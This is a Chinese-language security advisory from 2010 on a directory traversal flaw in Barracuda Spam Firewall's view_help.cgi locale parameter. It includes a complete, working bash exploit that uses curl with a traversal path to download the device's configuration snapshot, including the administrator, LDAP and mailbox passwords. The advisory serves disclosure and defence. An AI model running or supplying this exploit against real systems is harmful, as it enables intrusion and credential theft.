Barracuda垃圾邮件和病毒防火墙locale变量目录遍历漏洞
发布日期:2010-10-01
更新日期:2010-10-01
受影响系统:Barracuda Networks Barracuda Spam Firewall <= 4.1.1.021
描述:
BUGTRAQ ID:
43520
Barracuda Spam Firewall是用于保护邮件服务器的集成硬件和软件垃圾邮件解决方案。
Barracuda Spam Firewall的实现上存在输入验证漏洞,远程攻击者可能利用此漏洞读取任意文件。
软件的cgi-mod/view_help.cgi脚本没有充分检查过滤locale变量数据,远程者攻击者可以通过目录遍历串读取系统文件,造成敏感信息泄露。
<*来源:ShadowHatesYou
链接:
http://secunia.com/advisories/41609/
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
#!/bin/bash
# Exploit by ShadowHatesYou
#
Shadow@SquatThis.net
#
# The resulting output is an SQL dump containing the Barracuda's configuration, which includes goodies such as:
#
# The administrative password for the BSF(system_password)
# MTA LDAP passwords(mta_ldap_advanced_password)
# Password for each configured mailbox(user_password)
# Internal networking information(system_gateway, system_ip, system_netmask, system_primary_dns_server, system_secondary_dns_server)
#
#
# EDB Notes:
# If /cgi-mod/view_help.cgi returns a 404, try /cgi-bin/view_help.cgi instead. You should be able to determine this manually since Barracuda automatically redirects you to the login page anyway.
if [ $# != 1 ]; then
echo "# Barracuda Networks Spam & Virus Firewall <= 4.1.1.021 Remote Configuration Retrieval"
echo "# Use: $0 <host/ip> "
echo "#"
exit;
fi;
curl http://$1:8000/cgi-mod/view_help.cgi?locale=/../../../../../../../mail/snapshot/config.snapshot%00 > $1.config
ls -hl $1.config
建议:
厂商补丁:
Barracuda Networks
------------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.barracudanetworks.com/ns/products/spam_overview.php浏览次数:2303
严重程度:0(网友投票)
